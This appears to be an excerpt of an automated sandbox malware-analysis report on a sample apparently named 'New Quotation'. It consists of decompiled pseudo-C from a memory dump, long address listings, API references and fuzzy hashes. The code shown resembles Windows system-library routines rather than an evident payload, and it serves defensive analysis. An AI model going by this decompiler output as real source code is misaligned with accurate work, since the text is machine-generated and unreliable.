												__eflags =  *((intOrPtr*)(_t208 + 0xc)) - 0xffffffff;
												if( *((intOrPtr*)(_t208 + 0xc)) != 0xffffffff) {
													_t156 =  *_t208;
													__eflags =  *(_t156 - 0x20) & 0x00000020;
													if(( *(_t156 - 0x20) & 0x00000020) == 0) {
														asm("lock inc dword [edx+0x9c]");
														_t54 = _t211 + 0x50; // 0x18e30b0
														_t208 =  *_t54;
													}
												}
												_t55 = _t208 + 0x20; // 0x9
												_t224 =  *_t55;
												_v188 = _t224;
												goto L33;
											}
											goto L50;
										} else {
											_t42 = _t130 + 4; // 0x18e3fb0
											_t207 =  *_t42;
											goto L27;
										}
									}
									goto L33;
									L31:
									__eflags = _t130;
								} while (_t130 != 0);
								goto L32;
							}
							L33:
							_t218 = 0x1d8c6668;
							asm("lock cmpxchg [edi], ecx");
							_t189 = 1;
							__eflags = 1 - 1;
							if(1 != 1) {
								while(1) {
									__eflags = _t189 & 0x00000004;
									if((_t189 & 0x00000004) != 0) {
										goto L43;
									}
									L36:
									__eflags = _t189 & 0x00000002;
									if((_t189 & 0x00000002) == 0) {
										goto L43;
									} else {
										_t218 = 3;
									}
									L44:
									_t215 = _t218 + _t189;
									_t154 = _t189;
									asm("lock cmpxchg [ebx], esi");
									__eflags = _t154 - _t189;
									if(_t154 != _t189) {
										_t189 = _t154;
										__eflags = _t189 & 0x00000004;
										if((_t189 & 0x00000004) != 0) {
											goto L43;
										}
										goto L44;
									}
									_t167 = _a4;
									__eflags = _t218 - 3;
									if(_t218 == 3) {
										__eflags = 0;
										E1D803BDB(0x1d8c6668, 0, _t215);
									}
									_t224 = _v188;
									_t211 = _v176;
									goto L49;
									L43:
									_t218 = _t218 | 0xffffffff;
									__eflags = _t218;
									goto L44;
								}
							}
							L49:
							_t177 = 0x1000;
						} else {
							_t211 =  *0x1d8c5d68; // 0x18e2a80
							_v176 = _t211;
							_t36 = _t211 + 0x50; // 0x18e2b30
							_t37 =  *_t36 + 0x20; // 0x9
							_t224 =  *_t37;
							_v188 = _t224;
						}
						L50:
						__eflags = _t211;
						if(_t211 == 0) {
							break;
						} else {
							_t132 =  *[fs:0x18];
							__eflags =  *(_t132 + 0xfca) & _t177;
							if(( *(_t132 + 0xfca) & _t177) != 0) {
								L56:
								_v192 = 0;
								_t133 = E1D8510DF(_v196,  &_v192, 0);
								_t218 = _v176;
								__eflags = _t133;
								_t211 = _t218;
								_v192 = (_t133 < 0x00000000) - 0x00000001 & _v192;
								_t135 = E1D826039((_t133 < 0x00000000) - 0x00000001 & _v192, _t218, _v172, _v208, 1,  &_v180);
								_t195 = _v192;
								_t170 = _t135;
								__eflags = _v192;
								if(_v192 != 0) {
									E1D7ED3E1(_t170, _t195, _t224);
								}
								__eflags = _t170;
								if(_t170 >= 0) {
									__eflags = _t224 - 7;
									if(_t224 == 7) {
										__eflags = _a20;
										if(_a20 == 0) {
											_t146 =  *[fs:0x18];
											__eflags =  *(_t146 + 0xfca) & 0x00001000;
											if(( *(_t146 + 0xfca) & 0x00001000) != 0) {
												_t147 = E1D7F2180(0x1d8c32d8);
												__eflags = _t147;
												if(_t147 == 0) {
													_t211 = 0;
													__eflags = 0;
													_v181 = _t147;
													_t170 = E1D7F1934( *((intOrPtr*)(_t218 + 0x50)), 0,  &_v181);
												}
											}
										}
									}
									__eflags = _t170;
									if(_t170 >= 0) {
										__eflags =  *0x1d8c9230;
										_t224 = _v196;
										if(__eflags != 0) {
											_t211 =  *(_t218 + 0x18);
											E1D858514(_t224,  *(_t218 + 0x18), __eflags, _v180, 0,  &_v180);
										}
										__eflags =  *0x1d8c65f0;
										if( *0x1d8c65f0 != 0) {
											_t228 =  *0x1d8c91f0; // 0x0
											_v204 = 0;
											_t211 =  *0x7ffe0330;
											asm("ror esi, cl");
											_t224 = _t228 ^  *0x7ffe0330;
											 *0x1d8c91e0( &_v204, _t218, _v180, 0, _t224);
											 *(_t228 ^  *0x7ffe0330)();
											_t143 = _v204;
											__eflags = _t143;
											if(_t143 != 0) {
												_v180 = _t143;
											}
										}
									} else {
										_v180 = 0;
									}
								}
								__eflags = _t170 - 0xc0000135;
								if(_t170 == 0xc0000135) {
									L73:
									_t168 = 0xc000007a;
								} else {
									__eflags = _t170 - 0xc0000142;
									if(_t170 == 0xc0000142) {
										goto L73;
									}
								}
								E1D7ED3E1(_t168, _t218, _t224);
								__eflags = _t168 - 0xc000007a;
								if(_t168 != 0xc000007a) {
									goto L79;
								} else {
									_t225 = _v172;
									__eflags = _t225;
									if(_t225 == 0) {
										_t225 = _v208;
									}
									_t211 = _t225;
									__eflags = _v212;
									_t168 = (0 | _v212 != 0x00000000) + 0xc0000138;
									_push(_t168);
									E1D809F93(_t168, 0, _t225);
								}
							} else {
								__eflags = _t224 - _v200;
								if(_t224 >= _v200) {
									goto L56;
								} else {
									E1D7ED3E1(_t167, _t211, _t224);
									__eflags = _t224;
									if(_t224 < 0) {
										_t168 = 0xc000000d;
										L79:
										_t225 = _v172;
									} else {
										E1D7F19DF(0);
										_t118 = E1D8079F9();
										continue;
									}
								}
							}
						}
						__eflags = _v165;
						if(_v165 != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t225);
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							_t122 =  *0x1d8c9300; // 0x0
							__eflags = _t122 |  *0x1d8c9304;
							if((_t122 |  *0x1d8c9304) != 0) {
								__eflags =  *0x1d8c92e4 & 0x00000001;
								if(( *0x1d8c92e4 & 0x00000001) == 0) {
									_t181 =  *0x1d8c92ec; // 0x0
									__eflags = (_t181 >> 0x00000008 & 0x00000003) - 3;
									if((_t181 >> 0x00000008 & 0x00000003) == 3) {
										_t211 =  &_v216;
										_t124 = E1D883CD0(_v180,  &_v216, _t218);
										__eflags = _t124 - 1;
										if(_t124 != 1) {
											__eflags = _v216 & 0x00000010;
											if((_v216 & 0x00000010) != 0) {
												_t211 = 4;
												_t168 = E1D883C53(4,  &_v224);
												__eflags = _t168;
												if(_t168 < 0) {
													asm("int 0x29");
												}
											}
										}
									}
								}
							}
						}
						_pop(_t219);
						_pop(_t226);
						 *_v220 = _v180;
						__eflags = _v8 ^ _t231;
						_pop(_t169);
						return E1D814B50(_t168, _t169, _v8 ^ _t231, _t211, _t219, _t226);
						goto L91;
					}
					_t168 = 0xc0000135;
					goto L79;
				} else {
					_t174 =  *_t223 & 0x0000ffff;
					_t16 = _t174 + 1; // 0x1
					_t220 = _t16;
					if((_t223[1] & 0x0000ffff) < _t220) {
						L6:
						if(_t220 <= 0x80) {
							_t158 =  &_v140;
							_v172 =  &_v140;
							L11:
							E1D8188C0(_t158, _t223[2], _t174);
							_t118 = _v172;
							 *((char*)(_t118 + _t220 - 1)) = 0;
							goto L13;
						} else {
							_t160 =  *0x1d8c5d78; // 0x0
							_t158 = E1D7E5D90(_t176,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t160 + 0x180000, _t220);
							_v172 = _t158;
							if(_t158 != 0) {
								_v165 = 1;
								goto L11;
							} else {
								_pop(_t221);
								_pop(_t230);
								_pop(_t175);
								return E1D814B50(0xc000009a, _t175, _v8 ^ _t231, _t211, _t221, _t230);
							}
						}
					} else {
						_t118 = _t223[2];
						_v172 = _t118;
						if( *((char*)(_t174 + _t118)) == 0) {
							goto L13;
						} else {
							goto L6;
						}
					}
				}
				L91:
			}































































                                                                                                                                                                                          0x1d7ecf00
                                                                                                                                                                                          0x1d7ecf00
                                                                                                                                                                                          0x1d7ecf12
                                                                                                                                                                                          0x1d7ecf15
                                                                                                                                                                                          0x1d7ecf15
                                                                                                                                                                                          0x1d7ecf1d
                                                                                                                                                                                          0x1d7ecf27
                                                                                                                                                                                          0x1d7ecf2a
                                                                                                                                                                                          0x1d7ecf34
                                                                                                                                                                                          0x1d7ecf3a
                                                                                                                                                                                          0x1d7ecf44
                                                                                                                                                                                          0x1d7ecf4b
                                                                                                                                                                                          0x1d7ecf65
                                                                                                                                                                                          0x1d7ecf65
                                                                                                                                                                                          0x1d7ecf4d
                                                                                                                                                                                          0x1d7ecf52
                                                                                                                                                                                          0x1d7ecf57
                                                                                                                                                                                          0x1d7ecf63
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ecf63
                                                                                                                                                                                          0x1d7ecf71
                                                                                                                                                                                          0x1d7ed007
                                                                                                                                                                                          0x1d7ed007
                                                                                                                                                                                          0x1d7ed009
                                                                                                                                                                                          0x1d7ed00f
                                                                                                                                                                                          0x1d7ed00f
                                                                                                                                                                                          0x1d7ed012
                                                                                                                                                                                          0x1d7ed018
                                                                                                                                                                                          0x1d7ed01e
                                                                                                                                                                                          0x1d7ed01e
                                                                                                                                                                                          0x1d7ed020
                                                                                                                                                                                          0x1d7ed025
                                                                                                                                                                                          0x1d7ed02b
                                                                                                                                                                                          0x1d7ed02d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed033
                                                                                                                                                                                          0x1d7ed039
                                                                                                                                                                                          0x1d7ed05d
                                                                                                                                                                                          0x1d7ed062
                                                                                                                                                                                          0x1d7ed068
                                                                                                                                                                                          0x1d7ed06d
                                                                                                                                                                                          0x1d7ed070
                                                                                                                                                                                          0x1d7ed072
                                                                                                                                                                                          0x1d7ed074
                                                                                                                                                                                          0x1d7ed07d
                                                                                                                                                                                          0x1d7ed07d
                                                                                                                                                                                          0x1d7ed076
                                                                                                                                                                                          0x1d7ed076
                                                                                                                                                                                          0x1d7ed076
                                                                                                                                                                                          0x1d7ed074
                                                                                                                                                                                          0x1d7ed082
                                                                                                                                                                                          0x1d7ed085
                                                                                                                                                                                          0x1d7ed087
                                                                                                                                                                                          0x1d7ed0b0
                                                                                                                                                                                          0x1d7ed0b0
                                                                                                                                                                                          0x1d7ed090
                                                                                                                                                                                          0x1d7ed090
                                                                                                                                                                                          0x1d7ed090
                                                                                                                                                                                          0x1d7ed090
                                                                                                                                                                                          0x1d7ed093
                                                                                                                                                                                          0x1d7ed09c
                                                                                                                                                                                          0x1d7ed09e
                                                                                                                                                                                          0x1d7ed09e
                                                                                                                                                                                          0x1d7ed0a0
                                                                                                                                                                                          0x1d7ed0aa
                                                                                                                                                                                          0x1d7ed0aa
                                                                                                                                                                                          0x1d7ed0a2
                                                                                                                                                                                          0x1d7ed0a2
                                                                                                                                                                                          0x1d7ed0a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed0a6
                                                                                                                                                                                          0x1d7ed0a6
                                                                                                                                                                                          0x1d7ed0a6
                                                                                                                                                                                          0x1d7ed0a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed095
                                                                                                                                                                                          0x1d7ed095
                                                                                                                                                                                          0x1d7ed0e1
                                                                                                                                                                                          0x1d7ed0e3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed0e5
                                                                                                                                                                                          0x1d7ed0e5
                                                                                                                                                                                          0x1d7ed0e5
                                                                                                                                                                                          0x1d7ed0e8
                                                                                                                                                                                          0x1d7ed0e8
                                                                                                                                                                                          0x1d7ed0eb
                                                                                                                                                                                          0x1d7ed0f1
                                                                                                                                                                                          0x1d7ed0f5
                                                                                                                                                                                          0x1d7ed0f7
                                                                                                                                                                                          0x1d7ed0f9
                                                                                                                                                                                          0x1d7ed0fd
                                                                                                                                                                                          0x1d7ed0ff
                                                                                                                                                                                          0x1d7ed106
                                                                                                                                                                                          0x1d7ed106
                                                                                                                                                                                          0x1d7ed106
                                                                                                                                                                                          0x1d7ed0fd
                                                                                                                                                                                          0x1d7ed109
                                                                                                                                                                                          0x1d7ed109
                                                                                                                                                                                          0x1d7ed10c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed10c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed097
                                                                                                                                                                                          0x1d7ed097
                                                                                                                                                                                          0x1d7ed097
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed097
                                                                                                                                                                                          0x1d7ed095
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed0ac
                                                                                                                                                                                          0x1d7ed0ac
                                                                                                                                                                                          0x1d7ed0ac
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed090
                                                                                                                                                                                          0x1d7ed0b2
                                                                                                                                                                                          0x1d7ed0b9
                                                                                                                                                                                          0x1d7ed0be
                                                                                                                                                                                          0x1d7ed0c2
                                                                                                                                                                                          0x1d7ed0c4
                                                                                                                                                                                          0x1d7ed0c7
                                                                                                                                                                                          0x1d7ed0d0
                                                                                                                                                                                          0x1d7ed0d0
                                                                                                                                                                                          0x1d7ed0d3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed0d5
                                                                                                                                                                                          0x1d7ed0d5
                                                                                                                                                                                          0x1d7ed0d8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed0da
                                                                                                                                                                                          0x1d7ed0da
                                                                                                                                                                                          0x1d7ed0da
                                                                                                                                                                                          0x1d7ed117
                                                                                                                                                                                          0x1d7ed117
                                                                                                                                                                                          0x1d7ed11a
                                                                                                                                                                                          0x1d7ed11e
                                                                                                                                                                                          0x1d7ed122
                                                                                                                                                                                          0x1d7ed124
                                                                                                                                                                                          0x1d7ed126
                                                                                                                                                                                          0x1d7ed0d0
                                                                                                                                                                                          0x1d7ed0d3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed0d3
                                                                                                                                                                                          0x1d7ed12a
                                                                                                                                                                                          0x1d7ed12d
                                                                                                                                                                                          0x1d7ed130
                                                                                                                                                                                          0x1d7ed133
                                                                                                                                                                                          0x1d7ed13a
                                                                                                                                                                                          0x1d7ed13a
                                                                                                                                                                                          0x1d7ed13f
                                                                                                                                                                                          0x1d7ed145
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed114
                                                                                                                                                                                          0x1d7ed114
                                                                                                                                                                                          0x1d7ed114
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed114
                                                                                                                                                                                          0x1d7ed0d0
                                                                                                                                                                                          0x1d7ed14b
                                                                                                                                                                                          0x1d7ed14b
                                                                                                                                                                                          0x1d7ed03b
                                                                                                                                                                                          0x1d7ed03b
                                                                                                                                                                                          0x1d7ed041
                                                                                                                                                                                          0x1d7ed047
                                                                                                                                                                                          0x1d7ed04a
                                                                                                                                                                                          0x1d7ed04a
                                                                                                                                                                                          0x1d7ed04d
                                                                                                                                                                                          0x1d7ed04d
                                                                                                                                                                                          0x1d7ed150
                                                                                                                                                                                          0x1d7ed150
                                                                                                                                                                                          0x1d7ed152
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed158
                                                                                                                                                                                          0x1d7ed158
                                                                                                                                                                                          0x1d7ed15e
                                                                                                                                                                                          0x1d7ed165
                                                                                                                                                                                          0x1d7ed195
                                                                                                                                                                                          0x1d7ed1a3
                                                                                                                                                                                          0x1d7ed1ad
                                                                                                                                                                                          0x1d7ed1b2
                                                                                                                                                                                          0x1d7ed1ba
                                                                                                                                                                                          0x1d7ed1bc
                                                                                                                                                                                          0x1d7ed1dd
                                                                                                                                                                                          0x1d7ed1e3
                                                                                                                                                                                          0x1d7ed1e8
                                                                                                                                                                                          0x1d7ed1ee
                                                                                                                                                                                          0x1d7ed1f0
                                                                                                                                                                                          0x1d7ed1f2
                                                                                                                                                                                          0x1d7ed1f4
                                                                                                                                                                                          0x1d7ed1f4
                                                                                                                                                                                          0x1d7ed1f9
                                                                                                                                                                                          0x1d7ed1fb
                                                                                                                                                                                          0x1d7ed201
                                                                                                                                                                                          0x1d7ed204
                                                                                                                                                                                          0x1d7ed206
                                                                                                                                                                                          0x1d7ed20a
                                                                                                                                                                                          0x1d7ed20c
                                                                                                                                                                                          0x1d7ed217
                                                                                                                                                                                          0x1d7ed21e
                                                                                                                                                                                          0x1d7ed225
                                                                                                                                                                                          0x1d7ed22a
                                                                                                                                                                                          0x1d7ed22c
                                                                                                                                                                                          0x1d7ed231
                                                                                                                                                                                          0x1d7ed231
                                                                                                                                                                                          0x1d7ed233
                                                                                                                                                                                          0x1d7ed245
                                                                                                                                                                                          0x1d7ed245
                                                                                                                                                                                          0x1d7ed22c
                                                                                                                                                                                          0x1d7ed21e
                                                                                                                                                                                          0x1d7ed20a
                                                                                                                                                                                          0x1d7ed247
                                                                                                                                                                                          0x1d7ed249
                                                                                                                                                                                          0x1d7ed25a
                                                                                                                                                                                          0x1d7ed261
                                                                                                                                                                                          0x1d7ed267
                                                                                                                                                                                          0x1d7ed269
                                                                                                                                                                                          0x1d7ed27d
                                                                                                                                                                                          0x1d7ed27d
                                                                                                                                                                                          0x1d7ed282
                                                                                                                                                                                          0x1d7ed289
                                                                                                                                                                                          0x1d7ed28c
                                                                                                                                                                                          0x1d7ed2a0
                                                                                                                                                                                          0x1d7ed2af
                                                                                                                                                                                          0x1d7ed2be
                                                                                                                                                                                          0x1d7ed2c0
                                                                                                                                                                                          0x1d7ed2c4
                                                                                                                                                                                          0x1d7ed2ca
                                                                                                                                                                                          0x1d7ed2cc
                                                                                                                                                                                          0x1d7ed2d2
                                                                                                                                                                                          0x1d7ed2d4
                                                                                                                                                                                          0x1d7ed2d6
                                                                                                                                                                                          0x1d7ed2d6
                                                                                                                                                                                          0x1d7ed2d4
                                                                                                                                                                                          0x1d7ed24b
                                                                                                                                                                                          0x1d7ed24b
                                                                                                                                                                                          0x1d7ed24b
                                                                                                                                                                                          0x1d7ed249
                                                                                                                                                                                          0x1d7ed2dc
                                                                                                                                                                                          0x1d7ed2e2
                                                                                                                                                                                          0x1d7ed2ec
                                                                                                                                                                                          0x1d7ed2ec
                                                                                                                                                                                          0x1d7ed2e4
                                                                                                                                                                                          0x1d7ed2e4
                                                                                                                                                                                          0x1d7ed2ea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed2ea
                                                                                                                                                                                          0x1d7ed2f3
                                                                                                                                                                                          0x1d7ed2f8
                                                                                                                                                                                          0x1d7ed2fe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed300
                                                                                                                                                                                          0x1d7ed300
                                                                                                                                                                                          0x1d7ed306
                                                                                                                                                                                          0x1d7ed308
                                                                                                                                                                                          0x1d7ed30a
                                                                                                                                                                                          0x1d7ed30a
                                                                                                                                                                                          0x1d7ed312
                                                                                                                                                                                          0x1d7ed314
                                                                                                                                                                                          0x1d7ed31f
                                                                                                                                                                                          0x1d7ed325
                                                                                                                                                                                          0x1d7ed326
                                                                                                                                                                                          0x1d7ed326
                                                                                                                                                                                          0x1d7ed167
                                                                                                                                                                                          0x1d7ed167
                                                                                                                                                                                          0x1d7ed16d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed16f
                                                                                                                                                                                          0x1d7ed171
                                                                                                                                                                                          0x1d7ed176
                                                                                                                                                                                          0x1d7ed178
                                                                                                                                                                                          0x1d7ed18b
                                                                                                                                                                                          0x1d7ed332
                                                                                                                                                                                          0x1d7ed332
                                                                                                                                                                                          0x1d7ed17a
                                                                                                                                                                                          0x1d7ed17c
                                                                                                                                                                                          0x1d7ed181
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed181
                                                                                                                                                                                          0x1d7ed178
                                                                                                                                                                                          0x1d7ed16d
                                                                                                                                                                                          0x1d7ed165
                                                                                                                                                                                          0x1d7ed338
                                                                                                                                                                                          0x1d7ed33f
                                                                                                                                                                                          0x1d7ed34d
                                                                                                                                                                                          0x1d7ed34d
                                                                                                                                                                                          0x1d7ed352
                                                                                                                                                                                          0x1d7ed354
                                                                                                                                                                                          0x1d7ed356
                                                                                                                                                                                          0x1d7ed35b
                                                                                                                                                                                          0x1d7ed361
                                                                                                                                                                                          0x1d7ed363
                                                                                                                                                                                          0x1d7ed36a
                                                                                                                                                                                          0x1d7ed36c
                                                                                                                                                                                          0x1d7ed378
                                                                                                                                                                                          0x1d7ed37b
                                                                                                                                                                                          0x1d7ed383
                                                                                                                                                                                          0x1d7ed38b
                                                                                                                                                                                          0x1d7ed390
                                                                                                                                                                                          0x1d7ed393
                                                                                                                                                                                          0x1d7ed395
                                                                                                                                                                                          0x1d7ed39c
                                                                                                                                                                                          0x1d7ed3a4
                                                                                                                                                                                          0x1d7ed3b1
                                                                                                                                                                                          0x1d7ed3b3
                                                                                                                                                                                          0x1d7ed3b5
                                                                                                                                                                                          0x1d7ed3bc
                                                                                                                                                                                          0x1d7ed3bc
                                                                                                                                                                                          0x1d7ed3b5
                                                                                                                                                                                          0x1d7ed39c
                                                                                                                                                                                          0x1d7ed393
                                                                                                                                                                                          0x1d7ed37b
                                                                                                                                                                                          0x1d7ed36a
                                                                                                                                                                                          0x1d7ed361
                                                                                                                                                                                          0x1d7ed3ca
                                                                                                                                                                                          0x1d7ed3cb
                                                                                                                                                                                          0x1d7ed3cc
                                                                                                                                                                                          0x1d7ed3d3
                                                                                                                                                                                          0x1d7ed3d5
                                                                                                                                                                                          0x1d7ed3de
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed3de
                                                                                                                                                                                          0x1d7ed32d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ecf77
                                                                                                                                                                                          0x1d7ecf77
                                                                                                                                                                                          0x1d7ecf7e
                                                                                                                                                                                          0x1d7ecf7e
                                                                                                                                                                                          0x1d7ecf83
                                                                                                                                                                                          0x1d7ecf94
                                                                                                                                                                                          0x1d7ecf9a
                                                                                                                                                                                          0x1d7ecfe1
                                                                                                                                                                                          0x1d7ecfe7
                                                                                                                                                                                          0x1d7ecfed
                                                                                                                                                                                          0x1d7ecff2
                                                                                                                                                                                          0x1d7ecff7
                                                                                                                                                                                          0x1d7ed000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ecf9c
                                                                                                                                                                                          0x1d7ecf9c
                                                                                                                                                                                          0x1d7ecfb1
                                                                                                                                                                                          0x1d7ecfb6
                                                                                                                                                                                          0x1d7ecfbe
                                                                                                                                                                                          0x1d7ecfd8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ecfc0
                                                                                                                                                                                          0x1d7ecfc5
                                                                                                                                                                                          0x1d7ecfc6
                                                                                                                                                                                          0x1d7ecfc7
                                                                                                                                                                                          0x1d7ecfd5
                                                                                                                                                                                          0x1d7ecfd5
                                                                                                                                                                                          0x1d7ecfbe
                                                                                                                                                                                          0x1d7ecf85
                                                                                                                                                                                          0x1d7ecf85
                                                                                                                                                                                          0x1d7ecf88
                                                                                                                                                                                          0x1d7ecf92
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ecf92
                                                                                                                                                                                          0x1d7ecf83
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlDebugPrintTimes.NTDLL ref: 1D7ED2C4
                                                                                                                                                                                            • Part of subcall function 1D858514: RtlDebugPrintTimes.NTDLL ref: 1D858579
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                          • Opcode ID: cb10f68d13cf038be2e833c32648013bae0f6fc43fee55a4c3cc60159eeda823
                                                                                                                                                                                          • Instruction ID: dd8de4c2e9c7d4011f74cc079189e94353d78e7733eb4bd89e386d3709d6b862
                                                                                                                                                                                          • Opcode Fuzzy Hash: cb10f68d13cf038be2e833c32648013bae0f6fc43fee55a4c3cc60159eeda823
                                                                                                                                                                                          • Instruction Fuzzy Hash: CCD1C531A00359CFDB21CB1CC894BA9B7B5BF49364F0541EAD909AB251DB34AD85CF93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80CCD1 Relevance: 1.7, APIs: 1, Instructions: 197timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                          			E1D80CCD1(char __ecx, signed int __edx, signed int _a4) {
				char _v9;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v44;
				signed char _v48;
				signed int _v52;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t58;
				signed int _t61;
				signed int _t69;
				signed int _t78;
				signed int* _t96;
				signed int _t98;
				intOrPtr* _t101;
				signed char _t105;
				intOrPtr _t116;
				signed int _t120;
				signed int* _t124;
				intOrPtr* _t133;
				signed int _t135;
				signed int _t137;

				_t129 = __edx;
				_t58 = _a4;
				_v36 = __edx;
				_v20 =  *[fs:0x30];
				_t105 = _t58 + 2;
				_v48 = _t105;
				_v40 = __ecx;
				_t61 = 1 << _t105;
				_t133 = 0x1d8c933c + _t58 * 0xc;
				_v9 = 0;
				if(( *(_v20 + 0x28) & 1) != 0) {
					_v56 = __ecx;
					_t137 = 0;
					__eflags = 0;
					_v52 = __edx;
					L1D7E2330(_t61,  *_t133);
					_t101 =  *((intOrPtr*)(_t133 + 4));
					while(1) {
						__eflags = _t101 - _t133 + 4;
						if(_t101 == _t133 + 4) {
							break;
						}
						_v24 = _t101;
						_v44 = _t101 + 8;
						asm("lock xadd [eax], ecx");
						__eflags = 2 - 1;
						if(2 <= 1) {
							_push(0xe);
							_pop(2);
							asm("int 0x29");
						}
						E1D7E24D0( *_t133);
						_t129 =  *0x1d8c65fc; // 0x4e8a32e0
						_v16 =  *((intOrPtr*)(_t101 + 0x10));
						__eflags = _t129;
						if(_t129 == 0) {
							_push(0);
							_push("true");
							_push( &_v32);
							_push(0x24);
							_push(0xffffffff);
							_t78 = E1D812B20();
							__eflags = _t78;
							if(_t78 < 0) {
								E1D828AA0(2, _t129, _t78);
								goto L27;
							}
							_t129 = _v32;
							 *0x1d8c65fc = _t129;
							goto L6;
						} else {
							L6:
							_v28 = _v28 & 0x00000000;
							_push(0x20);
							asm("ror eax, cl");
							_t116 = _v20;
							_t83 = _v16 ^ _t129;
							_v16 = _v16 ^ _t129;
							__eflags =  *(_t116 + 0x68) & 0x00800000;
							if(( *(_t116 + 0x68) & 0x00800000) != 0) {
								_v28 = E1D888C65(_v40, _v36, _t116, _t83);
								_t83 = _v16;
							}
							 *0x1d8c91e0( &_v56);
							_t87 =  *_v16();
							_t120 = _v28;
							_t129 = _t87;
							_v16 = _t129;
							__eflags = _t120;
							if(_t120 != 0) {
								__eflags = _t129 - 0xffffffff;
								_t87 = 0 | __eflags != 0x00000000;
								 *(_t120 + 0x320) = __eflags != 0;
							}
							L1D7E2330(_t87,  *_t133);
							_t101 =  *_t101;
							asm("lock xadd [eax], ecx");
							__eflags = (_t120 | 0xffffffff) - 1;
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t47 = _v24 + 0xc; // 0x1c244c8d
									__eflags =  *_t47;
									if( *_t47 == 0) {
										_push(0x3c);
										L29:
										asm("int 0x29");
										L30:
										E1D80C640(_t101, 0, _t129, _t133);
										__eflags = 0;
										do {
											_t135 = _t137;
											_t137 =  *_t137;
											E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t135 + 8)));
											_t69 = E1D7F0130();
											_push(_t135);
											_push(0);
											__eflags = _t69;
											if(_t69 != 0) {
												_push( *0x1d8c921c);
											} else {
												_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
											}
											E1D7E3BC0();
											__eflags = _t137;
										} while (_t137 != 0);
										E1D80C640(0, 1, _t129, _t135);
										goto L1;
									}
									E1D80C640(_t101, 0, _t129, _t133);
									E1D801D66(0, _t129, 0);
									_t124 = _v24;
									_t129 =  *_t124;
									__eflags =  *(_t129 + 4) - _t124;
									if( *(_t129 + 4) != _t124) {
										L27:
										_push(3);
										goto L29;
									}
									_t50 =  &(_t124[1]); // 0xf2
									_t96 =  *_t50;
									__eflags =  *_t96 - _t124;
									if( *_t96 != _t124) {
										goto L27;
									}
									 *_t96 = _t129;
									 *(_t129 + 4) = _t96;
									__eflags = _t96 - _t129;
									if(_t96 == _t129) {
										_t124 = _v20 + 0x28;
										asm("lock btr [ecx], eax");
									}
									E1D801D66(_t124, _t129, 1);
									_t98 = _v24;
									 *_t98 = _t137;
									_t137 = _t98;
									E1D80C640(_t101, 1, _t129, _t133);
									goto L9;
								}
								_push(0xe);
								asm("int 0x29");
								goto L9;
							} else {
								L9:
								__eflags = _v16 - 0xffffffff;
								if(_v16 != 0xffffffff) {
									continue;
								}
								_v9 = 1;
								break;
							}
						}
					}
					E1D7E24D0( *_t133);
					__eflags = _t137;
					if(_t137 == 0) {
						goto L1;
					}
					goto L30;
				}
				L1:
				return _v9;
			}
































